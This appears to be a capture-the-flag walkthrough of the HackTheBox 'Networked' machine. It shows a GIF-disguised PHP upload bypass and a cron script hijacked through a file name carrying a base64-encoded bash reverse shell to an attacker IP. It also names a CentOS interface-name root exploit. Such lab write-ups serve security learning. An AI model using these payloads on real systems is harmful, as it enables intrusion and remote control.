Skip to main content
  1. writeup-ctf/

Writeup - Networked (HTB)

·784 words·4 mins·
Cybersecurity, Devops, Infrastructure
Table of Contents

This is a writeup for the Networked machine from the HackTheBox site.


First, let’s start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 7.4)
  • 80/tcp : HTTP web server (Apache 2.4.6)


First, I start by scanning the pages of the website.

I find several pages interesting and especially backup in which you can find an archive.

I download the archive, unzip it and find the following files inside:

The different files correspond to pages of the site:

So we have the possibility to upload images on the upload.php page and then to view them on the photos.php page.

By analyzing the source code of the upload.php page I find that there are checks on the upload files.

list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;

So I’m not just going to be able to send a PHP reverse shell with the .png extension because the site checks the file signature to verify its type. The signature of a file is a set of magic byte at the beginning of a file. By looking in the following list I find the signature of the GIF files: files signatures.

Before adding the signature, my file is simply a Unicode text:

After adding the GIF signature, we can see that the file is now identified as a GIF image data.

In addition to this signature I will have to change the extensions so that the file passes the security, but also that it is executed as PHP by the server:

mv reverse.jpg reverse.php.gif

I can now upload it and go view it to execute the code and run the reverse shell.

I now have a reverse shell as apache. But I don’t have the access to see the first flag. In the user’s home folder, I notice 2 interesting files:

The first one is a CRON file that executes the check_attack.php script every 3 minutes.

*/3 * * * * php /home/guly/check_attack.php

The second one is the script that allows you to delete suspicious files from the /var/www/html/uploads :

require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
  if ($value == 'index.html') {
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");


Interestingly, the script executes an rm command with a variable directly. All this without verification! So I will be able to create a file with a name composed of a command.

The file name will be composed of a name, then a ; to indicate the end of the command, then a reverse shell in base64 because we are not allowed to put / in the file name.

To create the file I use the following command:

touch /var/www/html/uploads/test';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzUgMD4mMQo= | base64 -d | bash'

I wait a few seconds and now I have a reverse shell and I can get the first flag.

Privilege escalation

First I check the sudo permissions of my user :

I have the right to run the script as root. Looking at the code of the script, I determine that it allows to change the name of a network interface.

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly

After some research on the Linux distributions used by the machine I find the following flaw: CentOS Network Interface Exploit.

On CentOS there is an exploit that allows to execute commands as root via the name of a network interface.

I execute the script and enter the following name for the interface:

I now have a reverse shell root and I can get the last flag.


To patch this host I think it would be necessary to perform a number of actions:

  • Do not leave the source code of the website accessible by all
  • Set up an additional protection on the upload to avoid sending code
  • Do not use variables in commands without Sanitizing


Writeup - Irked (HTB)
·430 words·3 mins
Writeup - Wonderland (THM)
·721 words·4 mins
Writeup - Nibbles (HTB)
·386 words·2 mins